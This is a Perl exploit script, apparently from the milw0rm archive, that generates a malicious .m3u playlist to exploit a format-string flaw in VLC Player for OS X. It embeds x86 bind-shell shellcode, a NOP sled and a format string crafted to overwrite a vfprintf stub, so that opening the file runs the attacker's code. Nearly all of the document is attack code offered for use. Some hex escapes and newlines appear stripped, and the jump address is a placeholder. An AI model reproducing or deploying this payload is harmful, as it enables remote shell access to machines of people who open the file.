#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-x86.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code.
#

$outfile = "pwnage.m3u";

$bindshell =
"x6ax42x58xcdx80x6ax61x58x99x52x68x10x02x11x5cx89" .
"xe1x52x42x52x42x52x6ax10xcdx80x99x93x51x53x52x6a" .
"x68x58xcdx80xb0x6axcdx80x52x53x52xb0x1excdx80x97" .
"x6ax02x59x6ax5ax58x51x57x51xcdx80x49x0fx89xf1xff" .
"xffxffx50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50" .
"x54x54x53x53xb0x3bxcdx80";

# MALLOC                 02800000-03008000 [ 8224K] rw-/rwx SM=COW  ...e_0x1300000
# Pattern found @ 0x298589e
# Pattern found @ 0x298ba92

$jmpaddr = 0x41424344;

$lo = ($jmpaddr >> 0) & 0xffff;
$hi = ($jmpaddr >> 16) & 0xffff;

printf "jump address is: 0x%x%xn", $hi, $lo;

$format = "%25" . ($lo-0x24) . "d" . "%25" . "23" . "%24" . "hn" . "%25" . ($hi-$lo) . "d" . "%25" . "24" . "%24" . "hn" ;

$writeaddr = 0xa0011393 ; # <dyld_stub___vfprintf>

printf "writing to file: %sn", $outfile;
open(PWNED,">$outfile");

print PWNED "#EXTM3Un" . "#EXTINF:0,1-07 " . "x90" x 50 . $bindshell . "n" .
"udp://--" . pack('l', $writeaddr+2) . pack('l', $writeaddr) .
$format . "i" x (999 - length("Can't get file status for ") ) . "n";

close(PWNED);

# milw0rm.com [2007-01-02]